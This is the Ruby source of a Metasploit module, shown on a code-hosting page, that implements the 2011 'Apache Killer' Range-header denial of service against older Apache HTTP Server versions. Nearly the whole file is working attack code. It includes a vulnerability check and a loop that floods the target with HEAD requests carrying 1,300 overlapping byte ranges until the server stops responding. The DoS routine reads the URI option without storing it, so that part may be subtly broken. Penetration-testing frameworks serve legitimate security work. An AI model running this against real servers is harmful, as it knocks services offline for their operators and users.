adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/modules/auxiliary/dos/http/apache_range_dos.rb
T
cgranleese-r7 a4b14d8b64 Runs Rubocop to fix layout in modules
2025-06-20 15:18:01 +01:00

136 lines
3.8 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::Dos
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Range Header DoS (Apache Killer)',
'Description' => %q{
The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x
through 2.2.19 allows remote attackers to cause a denial of service (memory and
CPU consumption) via a Range header that expresses multiple overlapping ranges,
exploit called "Apache Killer".
},
'Author' => [
'Kingcope', # original discovery
'Masashi Fujiwara', # metasploit module
'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
],
'License' => MSF_LICENSE,
'Actions' => [
['DOS', { 'Description' => 'Trigger Denial of Service against target' }],
['CHECK', { 'Description' => 'Check if target is vulnerable' }]
],
'DefaultAction' => 'DOS',
'References' => [
[ 'BID', '49303'],
[ 'CVE', '2011-3192'],
[ 'EDB', '17696'],
[ 'OSVDB', '74721' ],
],
'DisclosureDate' => '2011-08-19',
'Notes' => {
'AKA' => ['Apache Killer'],
'Stability' => [CRASH_SERVICE_DOWN],
'SideEffects' => [],
'Reliability' => []
}
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('URI', [ true, 'The request URI', '/']),
OptInt.new('RLIMIT', [ true, 'Number of requests to send', 50])
]
)
end
def run_host(_ip)
case action.name
when 'DOS'
conduct_dos
when 'CHECK'
check_for_dos
end
end
def check_for_dos
uri = datastore['URI']
rhost = datastore['RHOST']
res = send_request_cgi({
'uri' => uri,
'method' => 'HEAD',
'headers' => {
'HOST' => rhost,
'Range' => 'bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10',
'Request-Range' => 'bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10'
}
})
if res && res.code == 206
print_status("Response was #{res.code}")
print_status("Found Byte-Range Header DOS at #{uri}")
report_note(
:host => rhost,
:port => rport,
:type => 'apache.killer',
:data => { :uri => uri }
)
else
print_status("#{rhost} doesn't seem to be vulnerable at #{uri}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e
vprint_error(e.message)
end
def conduct_dos
datastore['URI']
rhost = datastore['RHOST']
ranges = ''
for i in (0..1299) do
ranges += ',5-' + i.to_s
end
for x in 1..datastore['RLIMIT']
begin
print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
_res = send_request_cgi(
{
'uri' => uri,
'method' => 'HEAD',
'headers' => {
'HOST' => rhost,
'Range' => "bytes=0-#{ranges}",
'Request-Range' => "bytes=0-#{ranges}"
}
},
1
)
rescue ::Rex::ConnectionRefused
print_error("Unable to connect to #{rhost}:#{rport}")
rescue ::Errno::ECONNRESET
print_good("DoS packet successful. #{rhost} not responding.")
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("Couldn't connect to #{rhost}:#{rport}")
rescue ::Timeout::Error, ::Errno::EPIPE => e
vprint_error(e.message)
end
end
end
end
Reference in New Issue View Git Blame Copy Permalink